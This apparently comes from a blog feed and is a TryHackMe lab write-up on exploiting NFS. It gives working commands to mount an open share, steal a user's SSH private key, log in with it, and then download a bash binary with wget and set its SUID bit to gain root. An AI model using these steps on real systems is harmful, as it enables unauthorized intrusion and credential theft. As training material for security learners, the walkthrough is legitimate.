Michael Muratovhttps://michaelmuratov.com/tags/privilege-escalation/Recent content on Michael MuratovHugo -- gohugo.ioen-usSat, 12 Oct 2024 00:00:00 +0000TryHackMe - NFShttps://michaelmuratov.com/blog/artifacts/guides/thm-nfs-room/Sat, 12 Oct 2024 00:00:00 +0000https://michaelmuratov.com/blog/artifacts/guides/thm-nfs-room/<p>This is a <code>TryHackMe Room Writeup</code></p> <link href="https://michaelmuratov.com/css/admonitions.min.css" rel="stylesheet" /> <div class="admonition note"> <div class="admonition-header"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512"><path d="M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z"/></svg> <span>Reference</span> </div> <div class="admonition-content"> <p><a href="https://tryhackme.com/r/room/networkservices2">💻 THM Network Services Room</a></p>This is a TryHackMe Room Writeup

Reference

💻 THM Network Services Room

Gaining Access Through NFS

Initial Reconnaissance

The first step to Network File System (NFS) exploitation is identifying an exposed NFS share on the target machine. A public NFS share might have insufficient access controls, allowing unauthorized mounting from a remote location. This gives us an initial vector to compromise the vulnerable server.

Example Nmap Scan: (NFS Scan highlighted)

 1root@ip-10-10-71-105:~# IP=10.10.190.97
 2root@ip-10-10-71-105:~# nmap -sS -T4 -F -oN output.txt $IP
 3
 4PORT      STATE SERVICE  VERSION
 522/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 6111/tcp   open  rpcbind  2-4 (RPC #100000)
 72049/tcp  open  nfs_acl  3 (RPC #100227)
 832969/tcp open  mountd   1-3 (RPC #100005)
 933463/tcp open  mountd   1-3 (RPC #100005)
1038233/tcp open  nlockmgr 1-4 (RPC #100021)
1143597/tcp open  mountd   1-3 (RPC #100005)
12
13MAC Address: 02:AE:30:CF:78:25 (Unknown)
14Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
15
16Read data files from: /usr/bin/../share/nmap
17Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
18Nmap done: 1 IP address (1 host up) scanned in 75.34 seconds
19        Raw packets sent: 128591 (5.658MB) | Rcvd: 128591 (5.144MB)

Mounting the Shared Drive

Remotely mounting the server’s NFS share from our attacker machine gains us access to the server’s file system, with its directories and files accessible directly on our device. This allows us to explore the server’s file system, exfiltrate files from the server onto our device and upload our files to the server. These actions will let us grab private information and load malicious files onto the server to further our attack.

1root@ip-10-10-71-105:~# sudo mount -t nfs $IP:home /tmp/mount/ -nolock

image

SSH Key Extraction

Navigating to the .ssh directory of a remote user on the mounted NFS share we found the user’s SSH private key, which should never be stored on the server itself and should be securely stored on a trusted user machine. Should the server be breached through a vulnerability, the attacker can create a persistent method of entry using the stored private key to pose as a trusted user on future login attempts.

1root@ip-10-10-71-105:~# cd /tmp/mount/cappucino/.ssh
2root@ip-10-10-71-105:/tmp/mount/cappucino/.ssh# cp id_rsa ~
3root@ip-10-10-71-105:/tmp/mount/cappucino/.ssh# cd ~
4root@ip-10-10-71-105:~# chmod 600 id_rsa
5root@ip-10-10-71-105:~# cp id_rsa /$local_folder

image

SSH Login with Stolen Key

After locating an SSH private key, it is simple to extract it using the NFS server by copying it from the shared drive to a local directory on the attack box. This file allows us to authenticate and gain access to the remote user’s account through SSH, giving us direct access to a user account on the server.

1root@ip-10-10-71-105:~# ssh -i id_rsa cappucino@$IP
Success

At this point the victim server has been compromised and we’ve established a foothold in their infrastructure. Our next steps will involve escalating privileges and gaining persistence on the host to further cement our control.

Super User Privilege Escalation via SUID Exploit

Uploading Malicious Script

Since we have 2 way connection, we can now upload anything we want to the server through the shared drive connection. We will upload a simple bash executable which we will use to escalate privileges and gain super user access on the server.

1root@ip-10-10-71-105:/tmp/mount/cappucino# wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

SUID Permission Modification

After placing the script on the target machine we can set its SUID (Set User ID) bit. This allowed the script to run with elevated (root) privileges, regardless of the user executing it.

1root@ip-10-10-71-105:/tmp/mount/cappucino# sudo chmod +sx bash
2root@ip-10-10-71-105:/tmp/mount/cappucino# ls -la bash
3    -rwsr-sr-x 1 root root 1113504 Oct  4 04:42 bash

image

Escalating to Superuser Privileges

Executed the modified SUID script to escalate privileges from the standard user to the superuser (root). This provided full control over the target system.

1cappucino@polonfs:~$ ./bash -p
2bash-4.4# whoami
3> root
Success

Now we have complete control over the victim server with super user access. Our next steps would be to establish persistence and scan for other devices on the network to initiate lateral movement.

Takeaways

  • NFS Security Misconfigurations: Exposed NFS shares without proper access controls can be a critical vulnerability, allowing unauthorized mounting and file access.

  • SUID Misconfigurations: SUID permissions on scripts and binaries can be exploited to gain elevated privileges, especially if the target does not enforce proper file permissions.

]]>